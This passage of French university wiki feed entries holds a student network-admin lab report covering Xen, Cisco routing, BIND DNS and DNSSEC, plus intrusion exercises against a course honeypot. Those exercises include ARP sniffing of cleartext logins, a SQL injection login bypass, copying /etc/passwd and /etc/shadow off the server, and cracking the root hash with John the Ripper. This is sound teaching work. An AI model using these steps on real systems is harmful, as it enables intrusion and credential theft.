 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54043</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54043"/>
				<updated>2020-11-30T13:48:33Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.2  Serveur DNS (02/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (16/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
On connecte physiquement l'ISR au SDSL: Dans le local technique SR52, on repere sur quel port est branché le l'ÍSR pour le mettre dans le VLAN 531&lt;br /&gt;
 conf t&lt;br /&gt;
 int Gi0/37&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 531&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Sur l'ISR:&lt;br /&gt;
* On creer le vlan 531:&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 531&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La documentation de ce point est disponible sur demande en contactant un membre du binôme.&lt;br /&gt;
&lt;br /&gt;
===Verifications===&lt;br /&gt;
https://www.trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
&lt;br /&gt;
			      8		; Serial&lt;br /&gt;
			 604800		; Refresh&lt;br /&gt;
			  86400		; Retry&lt;br /&gt;
			2419200		; Expire&lt;br /&gt;
			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site.signed&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie avec la commande suivante:&lt;br /&gt;
 dnssec-verify -o trompettedelamort.site db.trompettedelamort.site.signed&lt;br /&gt;
 &lt;br /&gt;
Qui nous renvoie ce résultat:&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.trompettedelamort.site.signed&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
